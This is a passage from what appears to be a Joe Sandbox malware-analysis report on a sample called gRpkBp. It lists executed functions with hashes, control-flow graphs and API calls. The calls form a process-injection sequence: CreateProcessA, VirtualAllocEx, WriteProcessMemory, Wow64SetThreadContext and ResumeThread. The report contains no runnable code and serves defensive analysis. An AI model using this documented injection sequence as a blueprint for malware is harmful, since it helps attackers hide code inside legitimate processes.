                                                Executed Functions

                                                Function 005916F4 Relevance: .0, Instructions: 8COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4442226c021e988481b3f7ae1afb6d0130e917bc7e2d946fc89ae57338bbaf7a
                                                • Instruction ID: 4d2008249007574f0c36815d3c4a77968ced582e2f9a1f94d3e6bb301bf6f6f3
                                                • Opcode Fuzzy Hash: 4442226c021e988481b3f7ae1afb6d0130e917bc7e2d946fc89ae57338bbaf7a
                                                • Instruction Fuzzy Hash: 7EA00202C9E82A808D405C5412014B5CC7C230F745EA07D20590F370030410C014240C
                                                Function 0025E8AC Relevance: 1.8, APIs: 1, Instructions: 329processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 337 25e8ac-25e8b0 338 25e8c5-25e951 337->338 339 25e8b2-25e8c4 337->339 341 25e953-25e96a 338->341 342 25e99a-25e9c2 338->342 339->338 341->342 347 25e96c-25e971 341->347 345 25e9c4-25e9d8 342->345 346 25ea08-25ea5e 342->346 345->346 354 25e9da-25e9df 345->354 356 25eaa4-25eb9b CreateProcessA 346->356 357 25ea60-25ea74 346->357 348 25e994-25e997 347->348 349 25e973-25e97d 347->349 348->342 351 25e981-25e990 349->351 352 25e97f 349->352 351->351 355 25e992 351->355 352->351 358 25e9e1-25e9eb 354->358 359 25ea02-25ea05 354->359 355->348 375 25eba4-25ec89 356->375 376 25eb9d-25eba3 356->376 357->356 365 25ea76-25ea7b 357->365 360 25e9ed 358->360 361 25e9ef-25e9fe 358->361 359->346 360->361 361->361 364 25ea00 361->364 364->359 366 25ea7d-25ea87 365->366 367 25ea9e-25eaa1 365->367 369 25ea89 366->369 370 25ea8b-25ea9a 366->370 367->356 369->370 370->370 371 25ea9c 370->371 371->367 388 25ec99-25ec9d 375->388 389 25ec8b-25ec8f 375->389 376->375 391 25ecad-25ecb1 388->391 392 25ec9f-25eca3 388->392 389->388 390 25ec91 389->390 390->388 394 25ecc1-25ecc5 391->394 395 25ecb3-25ecb7 391->395 392->391 393 25eca5 392->393 393->391 397 25ecc7-25ecf0 394->397 398 25ecfb-25ed06 394->398 395->394 396 25ecb9 395->396 396->394 397->398 402 25ed07 398->402 402->402
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0025EB7F
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 5ebc4ade9f78128b47b5753f25353018266c2e10f09ef4d3cc5b8e104001f4ca
                                                • Instruction ID: 9d44b8b9a2f7c059da6bc875ebd990637658c6dbcf8fc8f20afe52d9f3fdc6b0
                                                • Opcode Fuzzy Hash: 5ebc4ade9f78128b47b5753f25353018266c2e10f09ef4d3cc5b8e104001f4ca
                                                • Instruction Fuzzy Hash: 3CC14870D1021A8FDF24CFA8C841BEDBBB1BF49305F0091AAD859B7250DB749A99CF95
                                                Function 0025E8B8 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 403 25e8b8-25e951 405 25e953-25e96a 403->405 406 25e99a-25e9c2 403->406 405->406 411 25e96c-25e971 405->411 409 25e9c4-25e9d8 406->409 410 25ea08-25ea5e 406->410 409->410 418 25e9da-25e9df 409->418 420 25eaa4-25eb9b CreateProcessA 410->420 421 25ea60-25ea74 410->421 412 25e994-25e997 411->412 413 25e973-25e97d 411->413 412->406 415 25e981-25e990 413->415 416 25e97f 413->416 415->415 419 25e992 415->419 416->415 422 25e9e1-25e9eb 418->422 423 25ea02-25ea05 418->423 419->412 439 25eba4-25ec89 420->439 440 25eb9d-25eba3 420->440 421->420 429 25ea76-25ea7b 421->429 424 25e9ed 422->424 425 25e9ef-25e9fe 422->425 423->410 424->425 425->425 428 25ea00 425->428 428->423 430 25ea7d-25ea87 429->430 431 25ea9e-25eaa1 429->431 433 25ea89 430->433 434 25ea8b-25ea9a 430->434 431->420 433->434 434->434 435 25ea9c 434->435 435->431 452 25ec99-25ec9d 439->452 453 25ec8b-25ec8f 439->453 440->439 455 25ecad-25ecb1 452->455 456 25ec9f-25eca3 452->456 453->452 454 25ec91 453->454 454->452 458 25ecc1-25ecc5 455->458 459 25ecb3-25ecb7 455->459 456->455 457 25eca5 456->457 457->455 461 25ecc7-25ecf0 458->461 462 25ecfb-25ed06 458->462 459->458 460 25ecb9 459->460 460->458 461->462 466 25ed07 462->466 466->466
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0025EB7F
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: a86662c42aa8656ef18d02bf45ac67176fb5aa1d93244256db7377288187db63
                                                • Instruction ID: 221534f8819a2d38191b25a1a38f82c2c90f10f8740e14d13c2c2ee0dc1d6f21
                                                • Opcode Fuzzy Hash: a86662c42aa8656ef18d02bf45ac67176fb5aa1d93244256db7377288187db63
                                                • Instruction Fuzzy Hash: 56C13970D1021A8FDF24CFA8C841BEDBBB1BF09305F0091AAD859B7250DB749A99CF95
                                                Function 0025E519 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 467 25e519-25e58b 469 25e5a2-25e609 WriteProcessMemory 467->469 470 25e58d-25e59f 467->470 472 25e612-25e664 469->472 473 25e60b-25e611 469->473 470->469 473->472
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E5F3
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: f362261846f86411cae89e6fe44fa361f3f90f1277dce458d9330b75bc66b675
                                                • Instruction ID: ce8110d120b4a443e2576f2682cbcfe6e6da8e089dd94f0ba9db5acaadd6271b
                                                • Opcode Fuzzy Hash: f362261846f86411cae89e6fe44fa361f3f90f1277dce458d9330b75bc66b675
                                                • Instruction Fuzzy Hash: A941BBB4D002589FCF04CFA9D984AEEFBF1BB49314F24902AE819B7210D335AA55CF64
                                                Function 0025E520 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 478 25e520-25e58b 480 25e5a2-25e609 WriteProcessMemory 478->480 481 25e58d-25e59f 478->481 483 25e612-25e664 480->483 484 25e60b-25e611 480->484 481->480 484->483
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E5F3
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 7ee08480c8d184b95002f11e9398543883eb003a10f609cdc8de982e4b352a26
                                                • Instruction ID: b41511c9be659125e07dc5b7613a85a527e66096a0c9444f40a10fb3fd7d76c0
                                                • Opcode Fuzzy Hash: 7ee08480c8d184b95002f11e9398543883eb003a10f609cdc8de982e4b352a26
                                                • Instruction Fuzzy Hash: 1741A9B4D002589FCF04CFA9D984AEEFBF1BB49314F20942AE814B7210D335AA55CF68
                                                Function 0025E678 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 489 25e678-25e748 ReadProcessMemory 492 25e751-25e7a3 489->492 493 25e74a-25e750 489->493 493->492
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E732
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 4d06031e1ad977f7d30b75159ae51e200b9e68b564ee4f4c66147dcd72682db1
                                                • Instruction ID: 6a133adcdb2bd530d347e69879900071b89e3b06486f112e9c553c81506f5c17
                                                • Opcode Fuzzy Hash: 4d06031e1ad977f7d30b75159ae51e200b9e68b564ee4f4c66147dcd72682db1
                                                • Instruction Fuzzy Hash: 4D41BBB5D002589FCF14CFA9D984AEEFBB1BF49310F24942AE815B7200D735A956CF64
                                                Function 0025E680 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 498 25e680-25e748 ReadProcessMemory 501 25e751-25e7a3 498->501 502 25e74a-25e750 498->502 502->501
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E732
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 858b9af8bf9bf6bb85213a47aa5f7a0cb5cdabd143fc43b246ccdb5b115dad4a
                                                • Instruction ID: 446a216b33a513a515f6b92740b958c9ed8898b2a477a3fef6cd1da53f10cb49
                                                • Opcode Fuzzy Hash: 858b9af8bf9bf6bb85213a47aa5f7a0cb5cdabd143fc43b246ccdb5b115dad4a
                                                • Instruction Fuzzy Hash: 4E41BCB4D002589FCF14CFA9D884AEEFBB1BF49310F20942AE814B7200D735A955CF68
                                                Function 0025E3F1 Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 507 25e3f1-25e4b8 VirtualAllocEx 511 25e4c1-25e50b 507->511 512 25e4ba-25e4c0 507->512 512->511
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025E4A2
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 4b260f8e42b7e95547620231538d25d5c71e454eecb8ddc948ce3620a0202dd5
                                                • Instruction ID: 55028e16d4402585e0938ddd07c86b51cbb3bf6fc5f65052a23b7819fc471625
                                                • Opcode Fuzzy Hash: 4b260f8e42b7e95547620231538d25d5c71e454eecb8ddc948ce3620a0202dd5
                                                • Instruction Fuzzy Hash: 6041B8B4D002589BCF10CFA9D980AAEFBB1BF49310F20902AE814BB300C335A955CF69
                                                Function 0025E3F8 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 517 25e3f8-25e4b8 VirtualAllocEx 520 25e4c1-25e50b 517->520 521 25e4ba-25e4c0 517->521 521->520
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025E4A2
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 11719ea52ee5ac7b51af1aa0e552c81daa4e4275e7c31c873d97289516948599
                                                • Instruction ID: 9913fa32e5d2fe2a77929db767f0d03f1e8014a0bd4ebe9aa9afa0659e119326
                                                • Opcode Fuzzy Hash: 11719ea52ee5ac7b51af1aa0e552c81daa4e4275e7c31c873d97289516948599
                                                • Instruction Fuzzy Hash: 4941A9B4D002589BCF10CFA9D984AAEFBB1BF49310F10942AE814B7300D735A955CF69
                                                Function 0025E2C1 Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 526 25e2c1-25e328 529 25e33f-25e38d Wow64SetThreadContext 526->529 530 25e32a-25e33c 526->530 532 25e396-25e3e2 529->532 533 25e38f-25e395 529->533 530->529 533->532
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025E377
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 6acb485bfc17d468e4506e147325727b9fdc5f91f75add18290ba833a88185bf
                                                • Instruction ID: b9a9740d3987e664dadc2cd79b7288afe0acb86d4545f7f0fdd746065d71c05e
                                                • Opcode Fuzzy Hash: 6acb485bfc17d468e4506e147325727b9fdc5f91f75add18290ba833a88185bf
                                                • Instruction Fuzzy Hash: 8041B0B4D102589FCF14CFA9D884AEEFBB1BF49314F14806AE814B7240D7759A49CF54
                                                Function 0025E2C8 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 538 25e2c8-25e328 540 25e33f-25e38d Wow64SetThreadContext 538->540 541 25e32a-25e33c 538->541 543 25e396-25e3e2 540->543 544 25e38f-25e395 540->544 541->540 544->543
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025E377
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: f73de14120338ce4994d99aa28d260e929f98b2cfb8f2d256d52b710c7095d4f
                                                • Instruction ID: bde7b956455ac52f5379085621b57c185511c5c826f06906a1ed6c68ce752b25
                                                • Opcode Fuzzy Hash: f73de14120338ce4994d99aa28d260e929f98b2cfb8f2d256d52b710c7095d4f
                                                • Instruction Fuzzy Hash: A541AFB4D102589FCF14CFAAD884AEEFBB1BF49314F14842AE814B7240D7759A49CF54
                                                Function 0025DD98 Relevance: 1.6, APIs: 1, Instructions: 78threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 549 25dd98-25de34 ResumeThread 552 25de36-25de3c 549->552 553 25de3d-25de7f 549->553 552->553
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0025DE1E
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 6400bcce3da7f26be6532b2ed6bb8256104429d7aeeb55dba127a543fa0d6b66
                                                • Instruction ID: 54f50f1f2b4be5f5383b8010a7e3053133202bf25a9aee96ebe40976d6fbcbe9
                                                • Opcode Fuzzy Hash: 6400bcce3da7f26be6532b2ed6bb8256104429d7aeeb55dba127a543fa0d6b66
                                                • Instruction Fuzzy Hash: CD31CAB4D102089FCF10CFA9E885AEEFBB5AF49314F24942AE815B7340C735A945CF98
                                                Function 0025DDA0 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 558 25dda0-25de34 ResumeThread 561 25de36-25de3c 558->561 562 25de3d-25de7f 558->562 561->562
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0025DE1E
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: e0e7a65f9bba50c44a3872b91096ad3bf11d4d72d2e4ffad55d027c22403a233
                                                • Instruction ID: 34db04ab341d7392c3eb5b8c37bcc97a58ce25642d2602c1ef3cef8831bfa8ea
                                                • Opcode Fuzzy Hash: e0e7a65f9bba50c44a3872b91096ad3bf11d4d72d2e4ffad55d027c22403a233
                                                • Instruction Fuzzy Hash: 2531BCB4D102189FCF10CFA9E985AAEFBB5AF49314F14942AE815B7300C735A945CF98
                                                Function 00590D2A Relevance: .1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9cb5177fe5b13a7e25da29b3b00c7d5a113b3597cca56b86c0bfa2df47acab6
                                                • Instruction ID: 2f781ddca80b7582080205aac56f63dc68bc61d62b1602a420e89a0e7b4a6b00
                                                • Opcode Fuzzy Hash: a9cb5177fe5b13a7e25da29b3b00c7d5a113b3597cca56b86c0bfa2df47acab6
                                                • Instruction Fuzzy Hash: FA41E6B8A05259CFCF04DFA8D5909ADFBB5FF4D304F24A955E419A7286C730A841CBA0
                                                Function 00590CF7 Relevance: .1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4167fd27cc877484240d0a13c5c7d12bf3bc31bd46fb795a38f5f0dc79ebd856
                                                • Instruction ID: aa2c4ecce6a0306920d7a7d2969d77392c0e9be7b2d7271cba8e1c8035464038
                                                • Opcode Fuzzy Hash: 4167fd27cc877484240d0a13c5c7d12bf3bc31bd46fb795a38f5f0dc79ebd856
                                                • Instruction Fuzzy Hash: 2141A1B8A05259CFCB44DFA9D5949ADFFB2FF48304F24A959E819A7246C730A841CB50
                                                Function 0020D1D4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427589064.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_20d000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7415f959f2207d3e8fe1d170a4f9daa3fb49a8cff32d6124f2148eb50140fe9
                                                • Instruction ID: c9e556b25799056552f122b4e1096346ead389ec815d331bcdec8588690fb661
                                                • Opcode Fuzzy Hash: a7415f959f2207d3e8fe1d170a4f9daa3fb49a8cff32d6124f2148eb50140fe9
                                                • Instruction Fuzzy Hash: F621F2B5625340EFDB01CF94D9C0B26BBA1FB84314F24C5A9EC494B287C376D866CB61
                                                Function 0020D01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427589064.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_20d000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8ab75ddd04dfceca6ce20f7c5ebd51376ab3eb057a513b223b7ad1f11316134
                                                • Instruction ID: db842458e867606461db0e1d4a97861f36bc254c47f63b86c6d839507a1d46c4
                                                • Opcode Fuzzy Hash: c8ab75ddd04dfceca6ce20f7c5ebd51376ab3eb057a513b223b7ad1f11316134
                                                • Instruction Fuzzy Hash: 2C2100B5614340EFDB11CF64D8C0B26BB62EB84314F20C569E84D4B287C376D81BCBA1
                                                Function 00591414 Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7cead8869390632af6ffab88089e0c8a76fd3ff7a8328aef14081ad9e551b7ee
                                                • Instruction ID: cb7e623804dd8fb0002e2f4229f311ae23be501545e3b0f2cacf758205514a35
                                                • Opcode Fuzzy Hash: 7cead8869390632af6ffab88089e0c8a76fd3ff7a8328aef14081ad9e551b7ee
                                                • Instruction Fuzzy Hash: 7A310774D4522ADFDB24DF64C840BECBBB5BB48300F1041EAD50AA7284DB309A85DF40
                                                Function 005900AA Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 198f432658f4a20b4ada3f304cf1051272a46f7a8b179afa2d0af1f7369f0561
                                                • Instruction ID: 74d0db28e6ab030549e25bf53e26f635bfc2bbdf7b045f3e5599ec7097e9e53a
                                                • Opcode Fuzzy Hash: 198f432658f4a20b4ada3f304cf1051272a46f7a8b179afa2d0af1f7369f0561
                                                • Instruction Fuzzy Hash: 5631C274E013089FDF15EFA4C854AAEBBB2FB89301F208159D80A6B399DB315D42CF90
                                                Function 00591A3B Relevance: .1, Instructions: 67COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8cfcafbfbe90f94559ae0b434982a5642cc911b4622af106f5e7654619fa73c0
                                                • Instruction ID: 271ed2ef4e37b9eb70f1a265f5e07d2ed66b126339678cdcac0010ec93263e67
                                                • Opcode Fuzzy Hash: 8cfcafbfbe90f94559ae0b434982a5642cc911b4622af106f5e7654619fa73c0
                                                • Instruction Fuzzy Hash: 0A31F378904629CFCF64CF64C954BE8BBB5BB49311F1085EAC40EA7291D7309AC5CF54
                                                Function 00590040 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7390f163a7beca459959b015798909e4c7bf85df83ab76c1d70d07014e08b446
                                                • Instruction ID: 4444858f2ecb9e4dd62daee07230a4bf0d7c75ea848e82b9f2032f061d9b9d2a
                                                • Opcode Fuzzy Hash: 7390f163a7beca459959b015798909e4c7bf85df83ab76c1d70d07014e08b446
                                                • Instruction Fuzzy Hash: 4F112970D04208DFCF08DFAAD8846AEBBF6BF88300F10982AE805B7351DB7048018B51
                                                Function 0020D017 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427589064.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_20d000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction ID: 9758770a954de70f820226f0585bba39ff9fde5e3c17b4f2f65df7db2e1cf611
                                                • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction Fuzzy Hash: 9E118B75504380DFDB12CF54D9C4B15BBA2EB84314F28C6AAD8494B696C33AD85ACBA2
                                                Function 0020D1CF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427589064.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_20d000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction ID: 4a66b3a79bb19385eb1398b66d24a9eb98db44f2167a3c995b115566c15370f2
                                                • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction Fuzzy Hash: 8B11A975905280DFDB02CF54C5C4B15BBA1FB84314F28C6A9DC494B697C33AD85ACBA1
                                                Function 00591811 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1af67262ddaf74a3ca115409183087e53f65ec05206eddc734a882d7158f6da1
                                                • Instruction ID: d5ef56c5bcc2276192e8f1333dd3d7dac8a97229a850343a1f00b32c6a283cdf
                                                • Opcode Fuzzy Hash: 1af67262ddaf74a3ca115409183087e53f65ec05206eddc734a882d7158f6da1
                                                • Instruction Fuzzy Hash: 43111334908668DFCF65CF64CC846EEBFB9BB4A301F2080DAD409A7256D7315A8ADF40
                                                Function 005914B5 Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e871d43e50150d404074fdc393bd1cfd0216dac6a3b548b86b3ba4c33125597d
                                                • Instruction ID: e5571c37b80bd660cb5b00e6f036482cd9b7234a1429d3695d9e1c227f0f7019
                                                • Opcode Fuzzy Hash: e871d43e50150d404074fdc393bd1cfd0216dac6a3b548b86b3ba4c33125597d
                                                • Instruction Fuzzy Hash: 27111C74E05229DFEB24DF64CC44BECBBB5BB48301F1080D5E54AA7284D7706A86CF04
                                                Function 00590B18 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
